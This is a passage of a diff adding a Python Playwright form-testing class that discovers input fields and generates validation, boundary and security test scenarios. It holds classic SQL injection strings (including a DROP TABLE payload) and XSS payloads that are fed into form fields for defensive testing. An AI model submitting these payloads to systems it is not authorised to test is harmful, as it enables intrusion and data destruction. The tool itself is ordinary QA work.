| 69 |
+
self.testing_stats = {
|
| 70 |
+
"total_tests": 0,
|
| 71 |
+
"passed_tests": 0,
|
| 72 |
+
"failed_tests": 0,
|
| 73 |
+
"skipped_tests": 0,
|
| 74 |
+
"error_tests": 0
|
| 75 |
+
}
|
| 76 |
+
|
| 77 |
+
# Test data generators
|
| 78 |
+
self.valid_emails = [
|
| 79 |
+
"test@example.com",
|
| 80 |
+
"user@domain.org",
|
| 81 |
+
"admin@company.net",
|
| 82 |
+
"support@website.com"
|
| 83 |
+
]
|
| 84 |
+
|
| 85 |
+
self.invalid_emails = [
|
| 86 |
+
"invalid-email",
|
| 87 |
+
"@domain.com",
|
| 88 |
+
"user@",
|
| 89 |
+
"user..name@domain.com",
|
| 90 |
+
"user@domain",
|
| 91 |
+
"user name@domain.com",
|
| 92 |
+
"user@domain..com"
|
| 93 |
+
]
|
| 94 |
+
|
| 95 |
+
self.valid_passwords = [
|
| 96 |
+
"Password123!",
|
| 97 |
+
"SecurePass456@",
|
| 98 |
+
"MyPassword789#",
|
| 99 |
+
"TestPass2024$"
|
| 100 |
+
]
|
| 101 |
+
|
| 102 |
+
self.invalid_passwords = [
|
| 103 |
+
"", # Empty
|
| 104 |
+
"123", # Too short
|
| 105 |
+
"password", # No numbers/special chars
|
| 106 |
+
"PASSWORD", # No lowercase
|
| 107 |
+
"Password", # No numbers/special chars
|
| 108 |
+
"a" * 1000, # Too long
|
| 109 |
+
"pass word", # Contains space
|
| 110 |
+
"pass\tword", # Contains tab
|
| 111 |
+
"pass\nword" # Contains newline
|
| 112 |
+
]
|
| 113 |
+
|
| 114 |
+
self.edge_case_data = {
|
| 115 |
+
"sql_injection": [
|
| 116 |
+
"'; DROP TABLE users; --",
|
| 117 |
+
"' OR '1'='1",
|
| 118 |
+
"admin'--",
|
| 119 |
+
"' UNION SELECT * FROM users --"
|
| 120 |
+
],
|
| 121 |
+
"xss_attempts": [
|
| 122 |
+
"<script>alert('XSS')</script>",
|
| 123 |
+
"javascript:alert('XSS')",
|
| 124 |
+
"<img src=x onerror=alert('XSS')>",
|
| 125 |
+
"';alert('XSS');//"
|
| 126 |
+
],
|
| 127 |
+
"special_characters": [
|
| 128 |
+
"!@#$%^&*()_+-=[]{}|;':\",./<>?",
|
| 129 |
+
"测试用户",
|
| 130 |
+
"مستخدم_اختبار",
|
| 131 |
+
"тестовый_пользователь"
|
| 132 |
+
],
|
| 133 |
+
"boundary_values": [
|
| 134 |
+
"a" * 1, # Minimum length
|
| 135 |
+
"a" * 255, # Maximum typical length
|
| 136 |
+
"a" * 1000, # Very long
|
| 137 |
+
" " * 10, # Only spaces
|
| 138 |
+
"\t\n\r" * 5 # Control characters
|
| 139 |
+
]
|
| 140 |
+
}
|
| 141 |
+
|
| 142 |
+
async def discover_form_fields(self) -> List[FormField]:
|
| 143 |
+
"""Intelligently discover and analyze form fields on the page."""
|
| 144 |
+
logger.info("🔍 Starting intelligent form field discovery...")
|
| 145 |
+
|
| 146 |
+
form_fields = []
|
| 147 |
+
|
| 148 |
+
# Find all input fields
|
| 149 |
+
inputs = await self.page.locator("input").all()
|
| 150 |
+
|
| 151 |
+
for input_elem in inputs:
|
| 152 |
+
try:
|
| 153 |
+
field_type = await input_elem.get_attribute("type") or "text"
|
| 154 |
+
name = await input_elem.get_attribute("name") or ""
|
| 155 |
+
placeholder = await input_elem.get_attribute("placeholder") or ""
|
| 156 |
+
required = await input_elem.get_attribute("required") is not None
|
| 157 |
+
|
| 158 |
+
# Get validation attributes
|
| 159 |
+
pattern = await input_elem.get_attribute("pattern")
|
| 160 |
+
min_length = await input_elem.get_attribute("minlength")
|
| 161 |
+
max_length = await input_elem.get_attribute("maxlength")
|
| 162 |
+
|
| 163 |
+
# Convert to appropriate types
|
| 164 |
+
min_length = int(min_length) if min_length else None
|
| 165 |
+
max_length = int(max_length) if max_length else None
|
| 166 |
+
|
| 167 |
+
# Get select options if it's a select field
|
| 168 |
+
options = []
|
| 169 |
+
if field_type == "select-one" or field_type == "select-multiple":
|
| 170 |
+
option_elements = await input_elem.locator("option").all()
|
| 171 |
+
for opt in option_elements:
|
| 172 |
+
value = await opt.get_attribute("value")
|
| 173 |
+
text = await opt.text_content()
|
| 174 |
+
if value:
|
| 175 |
+
options.append(value)
|
| 176 |
+
elif text:
|
| 177 |
+
options.append(text.strip())
|
| 178 |
+
|
| 179 |
+
field = FormField(
|
| 180 |
+
element=input_elem,
|
| 181 |
+
field_type=field_type,
|
| 182 |
+
name=name,
|
| 183 |
+
placeholder=placeholder,
|
| 184 |
+
required=required,
|
| 185 |
+
validation_pattern=pattern,
|
| 186 |
+
min_length=min_length,
|
| 187 |
+
max_length=max_length,
|
| 188 |
+
options=options if options else None
|
| 189 |
+
)
|
| 190 |
+
|
| 191 |
+
form_fields.append(field)
|
| 192 |
+
logger.info(f"📝 Discovered field: {field_type} - {name} ({placeholder})")
|
| 193 |
+
|
| 194 |
+
except Exception as e:
|
| 195 |
+
# Use advanced error handler for detailed error information
|
| 196 |
+
detailed_error = await self.error_handler.handle_action_error(
|
| 197 |
+
error=e,
|
| 198 |
+
action="discover_form_field",
|
| 199 |
+
element_index=len(form_fields),
|
| 200 |
+
element_selector="input",
|
| 201 |
+
input_value=None
|
| 202 |
+
)
|
| 203 |
+
logger.warning(f"⚠️ Error analyzing input field: {detailed_error.suggested_fix}")
|
| 204 |
+
continue
|
| 205 |
+
|
| 206 |
+
# Find textarea fields
|
| 207 |
+
textareas = await self.page.locator("textarea").all()
|
| 208 |
+
for textarea in textareas:
|
| 209 |
+
try:
|
| 210 |
+
name = await textarea.get_attribute("name") or ""
|
| 211 |
+
placeholder = await textarea.get_attribute("placeholder") or ""
|
| 212 |
+
required = await textarea.get_attribute("required") is not None
|
| 213 |
+
|
| 214 |
+
field = FormField(
|
| 215 |
+
element=textarea,
|
| 216 |
+
field_type="textarea",
|
| 217 |
+
name=name,
|
| 218 |
+
placeholder=placeholder,
|
| 219 |
+
required=required
|
| 220 |
+
)
|
| 221 |
+
|
| 222 |
+
form_fields.append(field)
|
| 223 |
+
logger.info(f"📝 Discovered textarea: {name} ({placeholder})")
|
| 224 |
+
|
| 225 |
+
except Exception as e:
|
| 226 |
+
logger.warning(f"⚠️ Error analyzing textarea: {e}")
|
| 227 |
+
continue
|
| 228 |
+
|
| 229 |
+
# Find select fields
|
| 230 |
+
selects = await self.page.locator("select").all()
|
| 231 |
+
for select in selects:
|
| 232 |
+
try:
|
| 233 |
+
name = await select.get_attribute("name") or ""
|
| 234 |
+
placeholder = await select.get_attribute("aria-label") or ""
|
| 235 |
+
required = await select.get_attribute("required") is not None
|
| 236 |
+
|
| 237 |
+
options: List[str] = []
|
| 238 |
+
try:
|
| 239 |
+
option_elements = await select.locator("option").all()
|
| 240 |
+
for opt in option_elements:
|
| 241 |
+
value = await opt.get_attribute("value")
|
| 242 |
+
text = await opt.text_content()
|
| 243 |
+
if value:
|
| 244 |
+
options.append(value)
|
| 245 |
+
elif text:
|
| 246 |
+
options.append(text.strip())
|
| 247 |
+
except Exception as e:
|
| 248 |
+
logger.debug(f"Failed to read select options: {e}")
|
| 249 |
+
|
| 250 |
+
field = FormField(
|
| 251 |
+
element=select,
|
| 252 |
+
field_type="select",
|
| 253 |
+
name=name,
|
| 254 |
+
placeholder=placeholder,
|
| 255 |
+
required=required,
|
| 256 |
+
options=options if options else None
|
| 257 |
+
)
|
| 258 |
+
|
| 259 |
+
form_fields.append(field)
|
| 260 |
+
logger.info(f"📝 Discovered select: {name} (options={len(options)})")
|
| 261 |
+
|
| 262 |
+
except Exception as e:
|
| 263 |
+
logger.warning(f"⚠️ Error analyzing select: {e}")
|
| 264 |
+
continue
|
| 265 |
+
|
| 266 |
+
self.form_fields = form_fields
|
| 267 |
+
logger.info(f"✅ Form discovery complete: {len(form_fields)} fields found")
|
| 268 |
+
return form_fields
|
| 269 |
+
|
| 270 |
+
async def generate_test_scenarios(self) -> List[TestScenario]:
|
| 271 |
+
"""Generate comprehensive test scenarios based on discovered fields."""
|
| 272 |
+
logger.info("🧠 Generating intelligent test scenarios...")
|
| 273 |
+
|
| 274 |
+
scenarios = []
|
| 275 |
+
|
| 276 |
+
for field in self.form_fields:
|
| 277 |
+
field_scenarios = await self._generate_field_scenarios(field)
|
| 278 |
+
scenarios.extend(field_scenarios)
|
| 279 |
+
|
| 280 |
+
# Add cross-field validation scenarios
|
| 281 |
+
cross_field_scenarios = await self._generate_cross_field_scenarios()
|
| 282 |
+
scenarios.extend(cross_field_scenarios)
|
| 283 |
+
|
| 284 |
+
# Add security testing scenarios
|
| 285 |
+
security_scenarios = await self._generate_security_scenarios()
|
| 286 |
+
scenarios.extend(security_scenarios)
|
| 287 |
+
|
| 288 |
+
logger.info(f"✅ Generated {len(scenarios)} test scenarios")
|
| 289 |
+
return scenarios
|
| 290 |
+
|
| 291 |
+
async def _generate_field_scenarios(self, field: FormField) -> List[TestScenario]:
|
| 292 |
+
"""Generate test scenarios for a specific field."""
|
| 293 |
+
scenarios = []
|
| 294 |
+
|
| 295 |
+
# Determine appropriate test data based on field type
|
| 296 |
+
if field.field_type in ["email", "text"] and "email" in field.name.lower():
|
| 297 |
+
# Email field scenarios
|
| 298 |
+
scenarios.extend([
|
| 299 |
+
TestScenario(
|
| 300 |
+
name=f"Valid Email - {field.name}",
|
| 301 |
+
data={field.name: random.choice(self.valid_emails)},
|
| 302 |
+
expected_result="success",
|
| 303 |
+
description="Test with valid email format",
|
| 304 |
+
priority=1
|
| 305 |
+
),
|
| 306 |
+
TestScenario(
|
| 307 |
+
name=f"Invalid Email - {field.name}",
|
| 308 |
+
data={field.name: random.choice(self.invalid_emails)},
|
| 309 |
+
expected_result="validation_error",
|
| 310 |
+
description="Test with invalid email format",
|
| 311 |
+
priority=1
|
| 312 |
+
),
|
| 313 |
+
TestScenario(
|
| 314 |
+
name=f"Empty Email - {field.name}",
|
| 315 |
+
data={field.name: ""},
|
| 316 |
+
expected_result="required_error" if field.required else "success",
|
| 317 |
+
description="Test with empty email field",
|
| 318 |
+
priority=1
|
| 319 |
+
)
|
| 320 |
+
])
|
| 321 |
+
|
| 322 |
+
elif field.field_type == "password":
|
| 323 |
+
# Password field scenarios
|
| 324 |
+
scenarios.extend([
|
| 325 |
+
TestScenario(
|
| 326 |
+
name=f"Valid Password - {field.name}",
|
| 327 |
+
data={field.name: random.choice(self.valid_passwords)},
|
| 328 |
+
expected_result="success",
|
| 329 |
+
description="Test with valid password",
|
| 330 |
+
priority=1
|
| 331 |
+
),
|
| 332 |
+
TestScenario(
|
| 333 |
+
name=f"Invalid Password - {field.name}",
|
| 334 |
+
data={field.name: random.choice(self.invalid_passwords)},
|
| 335 |
+
expected_result="validation_error",
|
| 336 |
+
description="Test with invalid password",
|
| 337 |
+
priority=1
|
| 338 |
+
),
|
| 339 |
+
TestScenario(
|
| 340 |
+
name=f"Empty Password - {field.name}",
|
| 341 |
+
data={field.name: ""},
|
| 342 |
+
expected_result="required_error" if field.required else "success",
|
| 343 |
+
description="Test with empty password field",
|
| 344 |
+
priority=1
|
| 345 |
+
)
|
| 346 |
+
])
|
| 347 |
+
|
| 348 |
+
elif field.field_type in ["text", "textarea"]:
|
| 349 |
+
# General text field scenarios
|
| 350 |
+
scenarios.extend([
|
| 351 |
+
TestScenario(
|
| 352 |
+
name=f"Valid Text - {field.name}",
|
| 353 |
+
data={field.name: "Valid Test Data"},
|
| 354 |
+
expected_result="success",
|
| 355 |
+
description="Test with valid text input",
|
| 356 |
+
priority=2
|
| 357 |
+
),
|
| 358 |
+
TestScenario(
|
| 359 |
+
name=f"Empty Text - {field.name}",
|
| 360 |
+
data={field.name: ""},
|
| 361 |
+
expected_result="required_error" if field.required else "success",
|
| 362 |
+
description="Test with empty text field",
|
| 363 |
+
priority=1
|
| 364 |
+
),
|
| 365 |
+
TestScenario(
|
| 366 |
+
name=f"Special Characters - {field.name}",
|
| 367 |
+
data={field.name: random.choice(self.edge_case_data["special_characters"])},
|
| 368 |
+
expected_result="validation_error",
|
| 369 |
+
description="Test with special characters",
|
| 370 |
+
priority=2
|
| 371 |
+
)
|
| 372 |
+
])
|
| 373 |
+
|
| 374 |
+
# i18n, emoji, RTL, whitespace
|
| 375 |
+
scenarios.extend([
|
| 376 |
+
TestScenario(
|
| 377 |
+
name=f"Unicode i18n - {field.name}",
|
| 378 |
+
data={field.name: "测试 – تجربة – тест – परीक्षण"},
|
| 379 |
+
expected_result="success",
|
| 380 |
+
description="International characters input",
|
| 381 |
+
priority=2
|
| 382 |
+
),
|
| 383 |
+
TestScenario(
|
| 384 |
+
name=f"Emoji Input - {field.name}",
|
| 385 |
+
data={field.name: "😀🔥✨🚀"},
|
| 386 |
+
expected_result="success",
|
| 387 |
+
description="Emoji characters",
|
| 388 |
+
priority=3
|
| 389 |
+
),
|
| 390 |
+
TestScenario(
|
| 391 |
+
name=f"RTL Text - {field.name}",
|
| 392 |
+
data={field.name: "مرحبا بالعالم"},
|
| 393 |
+
expected_result="success",
|
| 394 |
+
description="Right-to-left language",
|
| 395 |
+
priority=3
|
| 396 |
+
),
|
| 397 |
+
TestScenario(
|
| 398 |
+
name=f"Whitespace Only - {field.name}",
|
| 399 |
+
data={field.name: " "},
|
| 400 |
+
expected_result="validation_error" if field.required else "success",
|
| 401 |
+
description="Spaces only",
|
| 402 |
+
priority=2
|
| 403 |
+
)
|
| 404 |
+
])
|
| 405 |
+
|
| 406 |
+
elif field.field_type in ["number"]:
|
| 407 |
+
scenarios.extend([
|
| 408 |
+
TestScenario(
|
| 409 |
+
name=f"Valid Number - {field.name}",
|
| 410 |
+
data={field.name: "123"},
|
| 411 |
+
expected_result="success",
|
| 412 |
+
description="Valid numeric input",
|
| 413 |
+
priority=2
|
| 414 |
+
),
|
| 415 |
+
TestScenario(
|
| 416 |
+
name=f"Negative Number - {field.name}",
|
| 417 |
+
data={field.name: "-5"},
|
| 418 |
+
expected_result="validation_error",
|
| 419 |
+
description="Negative value",
|
| 420 |
+
priority=2
|
| 421 |
+
),
|
| 422 |
+
TestScenario(
|
| 423 |
+
name=f"Non-numeric - {field.name}",
|
| 424 |
+
data={field.name: "abc"},
|
| 425 |
+
expected_result="validation_error",
|
| 426 |
+
description="Alphabetic in number field",
|
| 427 |
+
priority=1
|
| 428 |
+
)
|
| 429 |
+
])
|
| 430 |
+
|
| 431 |
+
elif field.field_type in ["url"]:
|
| 432 |
+
scenarios.extend([
|
| 433 |
+
TestScenario(
|
| 434 |
+
name=f"Valid URL - {field.name}",
|
| 435 |
+
data={field.name: "https://example.com"},
|
| 436 |
+
expected_result="success",
|
| 437 |
+
description="Valid URL",
|
| 438 |
+
priority=2
|
| 439 |
+
),
|
| 440 |
+
TestScenario(
|
| 441 |
+
name=f"Invalid URL - {field.name}",
|
| 442 |
+
data={field.name: "htp:/bad"},
|
| 443 |
+
expected_result="validation_error",
|
| 444 |
+
description="Malformed URL",
|
| 445 |
+
priority=1
|
| 446 |
+
)
|
| 447 |
+
])
|
| 448 |
+
|
| 449 |
+
elif field.field_type in ["tel"]:
|
| 450 |
+
scenarios.extend([
|
| 451 |
+
TestScenario(
|
| 452 |
+
name=f"Valid Tel - {field.name}",
|
| 453 |
+
data={field.name: "+1-202-555-0188"},
|
| 454 |
+
expected_result="success",
|
| 455 |
+
description="Valid phone",
|
| 456 |
+
priority=3
|
| 457 |
+
),
|
| 458 |
+
TestScenario(
|
| 459 |
+
name=f"Invalid Tel - {field.name}",
|
| 460 |
+
data={field.name: "abcd-123"},
|
| 461 |
+
expected_result="validation_error",
|
| 462 |
+
description="Invalid phone",
|
| 463 |
+
priority=2
|
| 464 |
+
)
|
| 465 |
+
])
|
| 466 |
+
|
| 467 |
+
elif field.field_type in ["date", "time", "datetime-local", "month", "week"]:
|
| 468 |
+
scenarios.extend([
|
| 469 |
+
TestScenario(
|
| 470 |
+
name=f"Valid {field.field_type} - {field.name}",
|
| 471 |
+
data={field.name: "2025-01-15" if field.field_type=="date" else ("12:34" if field.field_type=="time" else "2025-01-15T12:34")},
|
| 472 |
+
expected_result="success",
|
| 473 |
+
description="Valid date/time",
|
| 474 |
+
priority=3
|
| 475 |
+
),
|
| 476 |
+
TestScenario(
|
| 477 |
+
name=f"Invalid {field.field_type} - {field.name}",
|
| 478 |
+
data={field.name: "invalid"},
|
| 479 |
+
expected_result="validation_error",
|
| 480 |
+
description="Invalid date/time format",
|
| 481 |
+
priority=2
|
| 482 |
+
)
|
| 483 |
+
])
|
| 484 |
+
|
| 485 |
+
elif field.field_type in ["checkbox"]:
|
| 486 |
+
scenarios.extend([
|
| 487 |
+
TestScenario(
|
| 488 |
+
name=f"Check Checkbox - {field.name}",
|
| 489 |
+
data={field.name: True},
|
| 490 |
+
expected_result="success",
|
| 491 |
+
description="Toggle on",
|
| 492 |
+
priority=3
|
| 493 |
+
),
|
| 494 |
+
TestScenario(
|
| 495 |
+
name=f"Uncheck Checkbox - {field.name}",
|
| 496 |
+
data={field.name: False},
|
| 497 |
+
expected_result="success",
|
| 498 |
+
description="Toggle off",
|
| 499 |
+
priority=3
|
| 500 |
+
)
|
| 501 |
+
])
|
| 502 |
+
|
| 503 |
+
elif field.field_type in ["radio"]:
|
| 504 |
+
scenarios.append(TestScenario(
|
| 505 |
+
name=f"Select Radio - {field.name}",
|
| 506 |
+
data={field.name: True},
|
| 507 |
+
expected_result="success",
|
| 508 |
+
description="Select radio option",
|
| 509 |
+
priority=3
|
| 510 |
+
))
|
| 511 |
+
|
| 512 |
+
elif field.field_type in ["file"]:
|
| 513 |
+
scenarios.extend([
|
| 514 |
+
TestScenario(
|
| 515 |
+
name=f"Upload Small File - {field.name}",
|
| 516 |
+
data={field.name: "./tmp/test-small.txt"},
|
| 517 |
+
expected_result="success",
|
| 518 |
+
description="Upload small text file",
|
| 519 |
+
priority=2
|
| 520 |
+
),
|
| 521 |
+
TestScenario(
|
| 522 |
+
name=f"Upload Large File - {field.name}",
|
| 523 |
+
data={field.name: "./tmp/test-large.bin"},
|
| 524 |
+
expected_result="validation_error",
|
| 525 |
+
description="Upload large file beyond limit (if enforced)",
|
| 526 |
+
priority=2
|
| 527 |
+
)
|
| 528 |
+
])
|
| 529 |
+
|
| 530 |
+
# Add boundary testing
|
| 531 |
+
if field.min_length or field.max_length:
|
| 532 |
+
scenarios.extend(await self._generate_boundary_scenarios(field))
|
| 533 |
+
|
| 534 |
+
return scenarios
|
| 535 |
+
|
| 536 |
+
async def _generate_boundary_scenarios(self, field: FormField) -> List[TestScenario]:
|
| 537 |
+
"""Generate boundary value test scenarios."""
|
| 538 |
+
scenarios = []
|
| 539 |
+
|
| 540 |
+
if field.min_length:
|
| 541 |
+
scenarios.append(TestScenario(
|
| 542 |
+
name=f"Min Length - {field.name}",
|
| 543 |
+
data={field.name: "a" * (field.min_length - 1)},
|
| 544 |
+
expected_result="validation_error",
|
| 545 |
+
description=f"Test with length below minimum ({field.min_length - 1})",
|
| 546 |
+
priority=1
|
| 547 |
+
))
|
| 548 |
+
|
| 549 |
+
scenarios.append(TestScenario(
|
| 550 |
+
name=f"Exact Min Length - {field.name}",
|
| 551 |
+
data={field.name: "a" * field.min_length},
|
| 552 |
+
expected_result="success",
|
| 553 |
+
description=f"Test with exact minimum length ({field.min_length})",
|
| 554 |
+
priority=1
|
| 555 |
+
))
|
| 556 |
+
|
| 557 |
+
if field.max_length:
|
| 558 |
+
scenarios.append(TestScenario(
|
| 559 |
+
name=f"Exact Max Length - {field.name}",
|
| 560 |
+
data={field.name: "a" * field.max_length},
|
| 561 |
+
expected_result="success",
|
| 562 |
+
description=f"Test with exact maximum length ({field.max_length})",
|
| 563 |
+
priority=1
|
| 564 |
+
))
|
| 565 |
+
|
| 566 |
+
scenarios.append(TestScenario(
|
| 567 |
+
name=f"Exceed Max Length - {field.name}",
|
| 568 |
+
data={field.name: "a" * (field.max_length + 1)},
|
| 569 |
+
expected_result="validation_error",
|
| 570 |
+
description=f"Test with length exceeding maximum ({field.max_length + 1})",
|
| 571 |
+
priority=1
|
| 572 |
+
))
|
| 573 |
+
|
| 574 |
+
return scenarios
|
| 575 |
+
|
| 576 |
+
async def _generate_cross_field_scenarios(self) -> List[TestScenario]:
|
| 577 |
+
"""Generate scenarios that test cross-field validation."""
|
| 578 |
+
scenarios = []
|
| 579 |
+
|
| 580 |
+
# Find email and password fields
|
| 581 |
+
email_fields = [f for f in self.form_fields if "email" in f.name.lower() and f.field_type in ["email", "text"]]
|
| 582 |
+
password_fields = [f for f in self.form_fields if f.field_type == "password"]
|
| 583 |
+
|
| 584 |
+
if email_fields and password_fields:
|
| 585 |
+
# Test with matching valid credentials
|
| 586 |
+
scenarios.append(TestScenario(
|
| 587 |
+
name="Valid Login Credentials",
|
| 588 |
+
data={
|
| 589 |
+
email_fields[0].name: random.choice(self.valid_emails),
|
| 590 |
+
password_fields[0].name: random.choice(self.valid_passwords)
|
| 591 |
+
},
|
| 592 |
+
expected_result="success",
|
| 593 |
+
description="Test with valid email and password combination",
|
| 594 |
+
priority=1
|
| 595 |
+
))
|
| 596 |
+
|
| 597 |
+
# Test with mismatched credentials
|
| 598 |
+
scenarios.append(TestScenario(
|
| 599 |
+
name="Invalid Login Credentials",
|
| 600 |
+
data={
|
| 601 |
+
email_fields[0].name: random.choice(self.valid_emails),
|
| 602 |
+
password_fields[0].name: "WrongPassword123!"
|
| 603 |
+
},
|
| 604 |
+
expected_result="authentication_error",
|
| 605 |
+
description="Test with valid email but wrong password",
|
| 606 |
+
priority=1
|
| 607 |
+
))
|
| 608 |
+
|
| 609 |
+
return scenarios
|
| 610 |
+
|
| 611 |
+
async def _generate_security_scenarios(self) -> List[TestScenario]:
|
| 612 |
+
"""Generate security testing scenarios."""
|
| 613 |
+
scenarios = []
|
| 614 |
+
|
| 615 |
+
for field in self.form_fields:
|
| 616 |
+
if field.field_type in ["text", "email", "password", "textarea"]:
|
| 617 |
+
# SQL Injection tests
|
| 618 |
+
for sql_payload in self.edge_case_data["sql_injection"]:
|
| 619 |
+
scenarios.append(TestScenario(
|
| 620 |
+
name=f"SQL Injection - {field.name}",
|
| 621 |
+
data={field.name: sql_payload},
|
| 622 |
+
expected_result="security_error",
|
| 623 |
+
description=f"Test SQL injection protection for {field.name}",
|
| 624 |
+
priority=1
|
| 625 |
+
))
|
| 626 |
+
|
| 627 |
+
# XSS tests
|
| 628 |
+
for xss_payload in self.edge_case_data["xss_attempts"]:
|
| 629 |
+
scenarios.append(TestScenario(
|
| 630 |
+
name=f"XSS Attempt - {field.name}",
|
| 631 |
+
data={field.name: xss_payload},
|
| 632 |
+
expected_result="security_error",
|
| 633 |
+
description=f"Test XSS protection for {field.name}",
|
| 634 |
+
priority=1
|
| 635 |
+
))
|
| 636 |
+
|
| 637 |
+
return scenarios
|
| 638 |
+
|
| 639 |
+
async def execute_test_scenarios(self, scenarios: List[TestScenario]) -> List[TestResult]:
|
| 640 |
+
"""Execute all test scenarios and collect results."""
|
| 641 |
+
logger.info(f"🚀 Executing {len(scenarios)} test scenarios...")
|
| 642 |
+
|
| 643 |
+
results = []
|
| 644 |
+
self.testing_stats["total_tests"] = len(scenarios)
|
| 645 |
+
|
| 646 |
+
for i, scenario in enumerate(scenarios, 1):
|
| 647 |
+
logger.info(f"📋 Running scenario {i}/{len(scenarios)}: {scenario.name}")
|
| 648 |
+
|
| 649 |
+
try:
|
| 650 |
+
result = await self._execute_single_scenario(scenario)
|
| 651 |
+
results.append(result)
|
| 652 |
+
|
| 653 |
+
# Update statistics
|
| 654 |
+
if result.success:
|
| 655 |
+
self.testing_stats["passed_tests"] += 1
|
| 656 |
+
elif result.error_message:
|
| 657 |
+
self.testing_stats["error_tests"] += 1
|
| 658 |
+
else:
|
| 659 |
+
self.testing_stats["failed_tests"] += 1
|
| 660 |
+
|
| 661 |
+
# Add delay between tests to avoid overwhelming the server
|
| 662 |
+
await asyncio.sleep(1)
|
| 663 |
+
|
| 664 |
+
except Exception as e:
|
| 665 |
+
# Use advanced error handler for detailed error information
|
| 666 |
+
detailed_error = await self.error_handler.handle_action_error(
|
| 667 |
+
error=e,
|
| 668 |
+
action="execute_test_scenario",
|
| 669 |
+
element_index=None,
|
| 670 |
+
element_selector=None,
|
| 671 |
+
input_value=scenario.name
|
| 672 |
+
)
|
| 673 |
+
|
| 674 |
+
logger.error(f"❌ Error executing scenario {scenario.name}: {detailed_error.suggested_fix}")
|
| 675 |
+
|
| 676 |
+
# Attempt error recovery
|
| 677 |
+
recovery_success = await self.error_handler.attempt_error_recovery(detailed_error)
|
| 678 |
+
if recovery_success:
|
| 679 |
+
logger.info(f"🔄 Recovery successful for scenario: {scenario.name}")
|
| 680 |
+
try:
|
| 681 |
+
result = await self._execute_single_scenario(scenario)
|
| 682 |
+
results.append(result)
|
| 683 |
+
self.testing_stats["passed_tests"] += 1
|
| 684 |
+
continue
|
| 685 |
+
except:
|
| 686 |
+
pass
|
| 687 |
+
|
| 688 |
+
results.append(TestResult(
|
| 689 |
+
scenario=scenario,
|
| 690 |
+
success=False,
|
| 691 |
+
actual_result="error",
|
| 692 |
+
error_message=f"{str(e)}\n\nSuggested Fix:\n{detailed_error.suggested_fix}",
|
| 693 |
+
timestamp=datetime.now()
|
| 694 |
+
))
|
| 695 |
+
self.testing_stats["error_tests"] += 1
|
| 696 |
+
|
| 697 |
+
self.test_results = results
|
| 698 |
+
logger.info(f"✅ Test execution complete: {len(results)} results collected")
|
| 699 |
+
logger.info(f"📊 Test Statistics: {self.testing_stats}")
|
| 700 |
+
return results
|
| 701 |
+
|
| 702 |
+
async def _execute_single_scenario(self, scenario: TestScenario) -> TestResult:
|
| 703 |
+
"""Execute a single test scenario with enhanced error handling."""
|
| 704 |
+
try:
|
| 705 |
+
# Clear all form fields first
|
| 706 |
+
await self._clear_all_fields()
|
| 707 |
+
|
| 708 |
+
# Fill form with test data
|
| 709 |
+
for field_name, value in scenario.data.items():
|
| 710 |
+
field = next((f for f in self.form_fields if f.name == field_name), None)
|
| 711 |
+
if field:
|
| 712 |
+
try:
|
| 713 |
+
await self._set_field_value(field, value)
|
| 714 |
+
await asyncio.sleep(0.5) # Small delay for validation
|
| 715 |
+
except Exception as e:
|
| 716 |
+
# Handle field filling errors with detailed context
|
| 717 |
+
detailed_error = await self.error_handler.handle_action_error(
|
| 718 |
+
error=e,
|
| 719 |
+
action="fill_field",
|
| 720 |
+
element_index=None,
|
| 721 |
+
element_selector=f"[name='{field_name}']",
|
| 722 |
+
input_value=str(value)
|
| 723 |
+
)
|
| 724 |
+
logger.warning(f"⚠️ Error setting field '{field_name}': {detailed_error.suggested_fix}")
|
| 725 |
+
# Try alternative typing fallback for text-like fields
|
| 726 |
+
try:
|
| 727 |
+
await field.element.click()
|
| 728 |
+
await field.element.type(str(value))
|
| 729 |
+
except:
|
| 730 |
+
logger.error(f"❌ Fallback typing failed for '{field_name}'")
|
| 731 |
+
|
| 732 |
+
# Take screenshot before submission
|
| 733 |
+
screenshot_path = f"./screenshots/test_{scenario.name.replace(' ', '_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.png"
|
| 734 |
+
try:
|
| 735 |
+
await self.page.screenshot(path=screenshot_path)
|
| 736 |
+
except Exception as e:
|
| 737 |
+
logger.warning(f"⚠️ Failed to take screenshot: {e}")
|
| 738 |
+
screenshot_path = None
|
| 739 |
+
|
| 740 |
+
# Submit form
|
| 741 |
+
submit_button = await self.page.locator("button[type='submit'], input[type='submit']").first
|
| 742 |
+
if await submit_button.count() > 0:
|
| 743 |
+
try:
|
| 744 |
+
await submit_button.click()
|
| 745 |
+
await asyncio.sleep(2) # Wait for response
|
| 746 |
+
except Exception as e:
|
| 747 |
+
detailed_error = await self.error_handler.handle_action_error(
|
| 748 |
+
error=e,
|
| 749 |
+
action="click_submit",
|
| 750 |
+
element_index=None,
|
| 751 |
+
element_selector="button[type='submit'], input[type='submit']",
|
| 752 |
+
input_value=None
|
| 753 |
+
)
|
| 754 |
+
logger.warning(f"⚠️ Error clicking submit button: {detailed_error.suggested_fix}")
|
| 755 |
+
|
| 756 |
+
# Analyze result
|
| 757 |
+
actual_result = await self._analyze_form_result()
|
| 758 |
+
|
| 759 |
+
# Determine if test passed
|
| 760 |
+
success = self._evaluate_test_result(scenario, actual_result)
|
| 761 |
+
|
| 762 |
+
return TestResult(
|
| 763 |
+
scenario=scenario,
|
| 764 |
+
success=success,
|
| 765 |
+
actual_result=actual_result,
|
| 766 |
+
screenshot_path=screenshot_path,
|
| 767 |
+
timestamp=datetime.now()
|
| 768 |
+
)
|
| 769 |
+
|
| 770 |
+
except Exception as e:
|
| 771 |
+
# Use advanced error handler for detailed error information
|
| 772 |
+
detailed_error = await self.error_handler.handle_action_error(
|
| 773 |
+
error=e,
|
| 774 |
+
action="execute_single_scenario",
|
| 775 |
+
element_index=None,
|
| 776 |
+
element_selector=None,
|
| 777 |
+
input_value=scenario.name
|
| 778 |
+
)
|
| 779 |
+
|
| 780 |
+
return TestResult(
|
| 781 |
+
scenario=scenario,
|
| 782 |
+
success=False,
|
| 783 |
+
actual_result="error",
|
| 784 |
+
error_message=f"{str(e)}\n\nDetailed Error Information:\n{detailed_error.suggested_fix}",
|
| 785 |
+
timestamp=datetime.now()
|
| 786 |
+
)
|
| 787 |
+
|
| 788 |
+
async def _set_field_value(self, field: FormField, value: Any):
|
| 789 |
+
"""Set a field's value based on its type, supporting selects, checkboxes, radios, and files."""
|
| 790 |
+
t = (field.field_type or "").lower()
|
| 791 |
+
elem = field.element
|
| 792 |
+
if t in ["text", "email", "password", "url", "tel", "search", "textarea", "number", "date", "time", "datetime-local", "month", "week"]:
|
| 793 |
+
await elem.fill(str(value))
|
| 794 |
